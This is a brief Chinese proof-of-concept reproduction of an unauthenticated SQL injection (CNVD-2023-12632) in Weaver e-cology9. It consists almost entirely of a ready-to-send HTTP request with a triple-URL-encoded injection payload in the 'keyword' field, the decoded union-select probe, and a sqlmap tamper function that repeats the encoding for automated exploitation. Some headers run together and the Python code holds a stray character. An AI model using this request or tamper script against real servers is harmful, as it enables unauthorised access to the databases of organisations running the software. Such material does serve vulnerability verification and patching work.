CNVD-2023-12632泛微e-cology9 未授权SQL注入漏洞复现

POST /mobile/%20/plugin/browser.jsp HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 1222
isDis=1&browserTypeId=269&keyword=%25%32%35%25%33%36%25%33%31%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%35%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%38%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%32%25%33%37%25%32%35%25%33%35%25%33%33%25%32%35%25%33%35%25%33%31%25%32%35%25%33%34%25%36%33%25%32%35%25%33%35%25%36%36%25%32%35%25%33%34%25%33%35%25%32%35%25%33%35%25%33%38%25%32%35%25%33%34%25%33%39%25%32%35%25%33%35%25%33%33%25%32%35%25%33%35%25%33%34%25%32%35%25%33%35%25%33%33%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%37

a' union select 1,''+(select 'SQL_EXISTS')+'

def tamper(payload, **kwargs):    # URL encoding for all characters    encoded_payload = ''.join(['%' + format(ord(c), 'x') for c in payload])
    encoded_payload = ''.join(['%' + format(ord(c), 'x') for c in encoded_payload])
    encoded_payload = ''.join(['%' + format(ord(c), 'x') for c in encoded_payload])、    encoded_payload = encoded_payload.replace(' ', '%20')
    return encoded_payload